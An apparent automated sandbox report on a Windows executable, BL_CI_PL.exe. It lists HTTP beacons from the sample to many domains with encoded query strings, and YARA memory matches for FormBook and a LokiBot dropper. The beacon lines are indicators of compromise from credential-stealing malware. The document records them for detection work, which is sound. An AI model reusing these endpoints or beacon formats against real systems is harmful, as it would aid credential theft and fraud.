        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs HTTP/1.1Host: www.yghdlhax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDs HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDs HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF HTTP/1.1Host: www.reliablehomesellers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49807 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49845 version: TLS 1.2

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: BL_CI_PL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
